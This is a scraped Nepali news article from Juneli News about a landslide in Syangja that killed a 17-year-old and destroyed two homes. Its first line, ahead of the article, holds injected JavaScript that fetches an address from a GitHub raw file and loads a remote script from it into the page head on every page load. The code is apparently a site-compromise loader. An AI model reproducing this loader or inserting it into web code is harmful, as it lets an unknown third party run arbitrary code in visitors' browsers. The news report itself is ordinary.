;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); स्याङ्जामा पहिरोमा पुरिएर एक जनाको मृत्यु : २ घरमा क्षति – जुनेली न्युज
मङ्लबार, असार ११, २०८२
  • होमपेज
  • स्याङ्जामा पहिरोमा पुरिएर एक जनाको मृत्यु : २ घरमा क्षति
दुर्घटना/अपराध

स्याङ्जामा पहिरोमा पुरिएर एक जनाको मृत्यु : २ घरमा क्षति

असोज ८,

पाल्पा । तीन दिनदेखि परेको अविरल वर्षासगै आएको पहिरोले पुरिएर स्याङ्जामा बिहीबार एक जनाको मृत्यु भएको छ।

मृत्यु हुनेमा कालीगण्डकी गाउँपालिका ४ बिर्घास्थित गौतमटोलका बाबुराम दमाइका अन्दाजी १७ वर्षीय छोरा विष्णु परियार रहेको स्थानीय नेकपाका वडाध्यक्ष विष्णुप्रसाद पाण्डे (स्यामलाल) ले बताए।

घरमा सुतिरहेको अवस्थामा आज बिहान करिब २ बजे घर माथिबाट खसेको पहिरोले उनी पुरिएका थिए। उनको घटनास्थलमै मृत्यु भएको हो। माथिबाट मेसिनरी पर्खालसहित झरेको पहिरोले बाबुरामको घर र उनका दाइ जगतबहादुर दमाईको घर समेत भत्किएको छ। दुईवटा घर पूर्णरूपमा क्षति भएको पाण्डेले बताए। बाबुरामका भाइ मनबहादुरको घर पहिरोको जोखिममा परेको छ।

घरमा सुतिरहेका परिवारका अन्य सदस्य भने सकुशल रहेका छन। अहिले प्रहरी, स्थानीय उद्दारकार्यमा जुटिरहेका छन्। घटनाबारे थप विवरण आउन बाँकी छ।फाइल फोटो

फेसबुक प्रतिक्रियाहरु